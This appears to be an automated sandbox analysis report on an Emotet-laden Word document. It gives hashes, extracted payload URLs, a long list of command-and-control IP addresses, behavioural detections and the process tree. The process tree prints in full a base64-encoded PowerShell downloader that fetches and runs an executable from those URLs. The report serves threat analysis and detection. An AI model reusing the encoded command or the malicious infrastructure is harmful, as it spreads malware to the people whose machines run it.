Analysis
-
max time kernel
139s -
max time network
149s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
01-08-2020 19:37
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Exploit.Siggen2.13465.21876.20371.doc
Resource
win7
General
-
Target
SecuriteInfo.com.Exploit.Siggen2.13465.21876.20371.doc
-
Size
168KB
-
MD5
7b47c08a4c4f10203169c0c7ceab2170
-
SHA1
b5b04a8ff3dcd39452cef492f13e86c510fa8131
-
SHA256
3d5427a07cdecdce3e2943473bf2a141a3eeff0e22919c7b1fe3378aed3d1590
-
SHA512
26875b4b30d31a63d875b8ddb4b8671e76de16b6725e07d923f499b6bbcaeb6c67ad1ee369d8425862eee33228b36259b5b02a10308e32cd3157e26cfdf38524
Malware Config
Extracted
http://rectificadoscarrion.com/wp-includes/EiQ/
http://renekok.com/QbWyat/
http://www.onlinemediadesigns.com/bin/nObh/
http://renegaderadio.net/haunted/cA5zuC5/
http://qatifsport.net/t/NbQq254/
Extracted
emotet
73.116.193.136:80
185.94.252.13:443
149.62.173.247:8080
89.32.150.160:8080
185.94.252.12:80
77.90.136.129:8080
83.169.21.32:7080
104.236.161.64:8080
114.109.179.60:80
189.2.177.210:443
68.183.190.199:8080
144.139.91.187:443
185.94.252.27:443
190.181.235.46:80
82.196.15.205:8080
46.28.111.142:7080
181.167.96.215:80
202.62.39.111:80
219.92.13.25:80
191.99.160.58:80
50.28.51.143:8080
172.104.169.32:8080
192.241.146.84:8080
82.240.207.95:443
80.249.176.206:80
2.47.112.152:80
212.231.60.98:80
77.55.211.77:8080
170.81.48.2:80
5.196.35.138:7080
143.0.87.101:80
190.6.193.152:8080
217.199.160.224:7080
187.162.248.237:80
93.151.186.85:80
177.74.228.34:80
204.225.249.100:7080
217.13.106.14:8080
51.255.165.160:8080
104.131.103.37:8080
177.72.13.80:80
190.163.31.26:80
186.70.127.199:8090
61.92.159.208:8080
12.162.84.2:8080
71.50.31.38:80
186.250.52.226:8080
92.23.34.86:80
177.144.135.2:80
201.213.156.176:80
190.147.137.153:443
94.176.234.118:443
181.129.96.162:8080
178.79.163.131:8080
111.67.12.221:8080
177.66.190.130:80
191.182.6.118:80
68.183.170.114:8080
177.73.0.98:443
203.25.159.3:8080
45.161.242.102:80
181.120.79.227:80
72.47.248.48:7080
177.139.131.143:443
189.194.58.119:80
137.74.106.111:7080
189.1.185.98:8080
190.194.242.254:443
190.17.195.202:80
192.241.143.52:8080
87.106.46.107:8080
212.71.237.140:8080
179.60.229.168:443
70.32.84.74:8080
70.32.115.157:8080
104.131.41.185:8080
Signatures
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 488 WINWORD.EXE 488 WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3140 2044 powersheLL.exe -
Executes dropped EXE 2 IoCs
Processes:
285.exeKBDES.exepid process 2584 285.exe 568 KBDES.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
285.exedescription pid process target process PID 2584 wrote to memory of 568 2584 285.exe KBDES.exe PID 2584 wrote to memory of 568 2584 285.exe KBDES.exe PID 2584 wrote to memory of 568 2584 285.exe KBDES.exe -
Emotet Payload 4 IoCs
Detects Emotet payload in memory.
Processes:
resource yara_rule behavioral2/memory/2584-10-0x0000000000690000-0x000000000069C000-memory.dmp emotet behavioral2/memory/2584-10-0x0000000000690000-0x000000000069C000-memory.dmp emotet behavioral2/memory/568-13-0x0000000000780000-0x000000000078C000-memory.dmp emotet behavioral2/memory/568-13-0x0000000000780000-0x000000000078C000-memory.dmp emotet -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Drops file in System32 directory 1 IoCs
Processes:
285.exedescription ioc process File opened for modification C:\Windows\SysWOW64\TimeDateMUICallback\KBDES.exe 285.exe -
Suspicious use of SetWindowsHookEx 11 IoCs
Processes:
WINWORD.EXE285.exeKBDES.exepid process 488 WINWORD.EXE 488 WINWORD.EXE 488 WINWORD.EXE 488 WINWORD.EXE 488 WINWORD.EXE 488 WINWORD.EXE 488 WINWORD.EXE 488 WINWORD.EXE 488 WINWORD.EXE 2584 285.exe 568 KBDES.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powersheLL.exeKBDES.exepid process 3140 powersheLL.exe 3140 powersheLL.exe 3140 powersheLL.exe 568 KBDES.exe 568 KBDES.exe 568 KBDES.exe 568 KBDES.exe 568 KBDES.exe 568 KBDES.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powersheLL.exeflow pid process 27 3140 powersheLL.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powersheLL.exedescription pid process Token: SeDebugPrivilege 3140 powersheLL.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen2.13465.21876.20371.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- Enumerates system info in registry
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JABUAFUATwBPAEYAagBqAGQAPQAnAEoARQBPAFUAUwBkAGUAawAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBDAFUAUgBpAHQAeQBQAGAAUgBvAFQAbwBDAE8AbAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAEMAVQBaAFEAWgB0AHkAYQAgAD0AIAAnADIAOAA1ACcAOwAkAE4ASQBCAEMAQwBvAHMAdgA9ACcASgBPAEYASwBIAHAAdABvACcAOwAkAEcARwBNAEIAUQBiAHkAaQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAQwBVAFoAUQBaAHQAeQBhACsAJwAuAGUAeABlACcAOwAkAFMAQgBDAFMATQBmAG8AZAA9ACcASQBCAFYATABPAG0AcABuACcAOwAkAE4AVwBEAEcATAB4AHIAbwA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAATgBlAHQALgBXAEUAYgBjAGwASQBFAG4AVAA7ACQATwBaAEQAQQBLAGcAdgBwAD0AJwBoAHQAdABwADoALwAvAHIAZQBjAHQAaQBmAGkAYwBhAGQAbwBzAGMAYQByAHIAaQBvAG4ALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEUAaQBRAC8AKgBoAHQAdABwADoALwAvAHIAZQBuAGUAawBvAGsALgBjAG8AbQAvAFEAYgBXAHkAYQB0AC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AbwBuAGwAaQBuAGUAbQBlAGQAaQBhAGQAZQBzAGkAZwBuAHMALgBjAG8AbQAvAGIAaQBuAC8AbgBPAGIAaAAvACoAaAB0AHQAcAA6AC8ALwByAGUAbgBlAGcAYQBkAGUAcgBhAGQAaQBvAC4AbgBlAHQALwBoAGEAdQBuAHQAZQBkAC8AYwBBADUAegB1AEMANQAvACoAaAB0AHQAcAA6AC8ALwBxAGEAdABpAGYAcwBwAG8AcgB0AC4AbgBlAHQALwB0AC8ATgBiAFEAcQAyADUANAAvACcALgAiAHMAcABgAGwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUwBTAE0AQQBOAG8AYwB1AD0AJwBEAFQARwBGAFoAcABhAHMAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFoATgBaAEkASQBpAG4AaQAgAGkAbgAgACQATwBaAEQAQQBLAGcAdgBwACkAewB0AHIAeQB7ACQATgBXAEQARwBMAHgAcgBvAC4AIgBEAE8AdwBuAGAAbABgAE8AYABBAGQAZgBJAGwAZQAiACgAJABaAE4AWgBJAEkAaQBuAGkALAAgACQARwBHAE0AQgBRAGIAeQBpACkAOwAkAEYAVgBWAFYATgB5AGsAawA9ACcASwBYAEEAVABVAHUAZQBiACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQARwBHAE0AQgBRAGIAeQBpACkALgAiAGwARQBgAE4AZwBUAEgAIgAgAC0AZwBlACAAMwA2ADkANQA3ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAFIAYABlAGEAYABUAEUAIgAoACQARwBHAE0AQgBRAGIAeQBpACkAOwAkAFMATgBPAFEAUwB5AGsAagA9ACcAQwBDAEcATABWAGcAawBzACcAOwBiAHIAZQBhAGsAOwAkAFcARQBPAFAARAB2AHIAeAA9ACcASwBZAE0AQQBYAHQAagBhACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEARgBEAFcARABvAG4AaAA9ACcARQBNAEUATgBLAGIAcQBmACcA1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\285.exeC:\Users\Admin\285.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\TimeDateMUICallback\KBDES.exe"C:\Windows\SysWOW64\TimeDateMUICallback\KBDES.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\285.exe
-
C:\Users\Admin\285.exe
-
C:\Windows\SysWOW64\TimeDateMUICallback\KBDES.exe
-
memory/488-4-0x000001D38DFA1000-0x000001D38DFD1000-memory.dmpFilesize
192KB
-
memory/568-11-0x0000000000000000-mapping.dmp
-
memory/568-13-0x0000000000780000-0x000000000078C000-memory.dmpFilesize
48KB
-
memory/2584-10-0x0000000000690000-0x000000000069C000-memory.dmpFilesize
48KB